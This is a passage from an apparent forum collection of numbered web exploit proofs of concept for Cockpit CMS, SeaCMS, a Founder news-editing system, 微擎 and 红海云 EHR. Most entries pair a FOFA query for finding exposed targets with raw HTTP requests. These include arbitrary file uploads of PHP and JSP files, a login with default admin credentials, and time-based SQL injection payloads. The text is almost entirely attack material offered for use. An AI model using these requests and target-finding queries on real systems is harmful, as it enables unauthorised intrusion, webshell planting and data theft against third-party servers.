199. Cockpit assetsmanager/upload interface file upload

1. Run the PoC to obtain the CSRF token, then obtain the cookie, then upload and access the result:
GET /auth/login?to=/ HTTP/1.1

Response: 200, returning csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"

2. Use the JWT obtained in the previous step to obtain a cookie:

POST /auth/check HTTP/1.1
Content-Type: application/json

{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}

Response: 200, returning:
Set-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/
Fofa:title="Authenticate Please!"
POST /assetsmanager/upload HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92

-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
Content-Type: text/php

<?php echo "tttt";unlink(__FILE__);?>
-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="folder"

-----------------------------36D28FBc36bd6feE7Fb3--

/storage/uploads/tttt.php

200. SeaCMS (海洋影视管理系统) dmku SQL injection
FOFA:app="海洋CMS"
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

201. 方正全媒体新闻采编系统 binary SQL injection
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
POST /newsedit/newsplan/task/binary.do HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1

202. 微擎系统 AccountEdit arbitrary file upload
FOFA:body="/Widgets/WidgetCollection/"
Obtain the __VIEWSTATE and __EVENTVALIDATION values:
GET /User/AccountEdit.aspx HTTP/1.1
Host: 滑板人之家
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
Content-Length: 0

Substitute the __VIEWSTATE and __EVENTVALIDATION values:
POST /User/AccountEdit.aspx HTTP/1.1
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687

-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__VIEWSTATE"

__VIEWSTATE
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__EVENTVALIDATION"

__EVENTVALIDATION
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
Content-Type: text/plain

Hello World!
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"

上传图片
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"


-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"


-----------------------------786435874t38587593865736587346567358735687--

/_data/Uploads/1123.txt

203. 红海云EHR PtFjk file upload
FOFA:body="RedseaPlatform"
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
Host: x.x.x.x
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Length: 210

------WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
Content-Type:image/jpeg

<% out.print("hello,eHR");%>
------WebKitFormBoundaryt7WbDl1tXogoZys4--

Welcome to 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2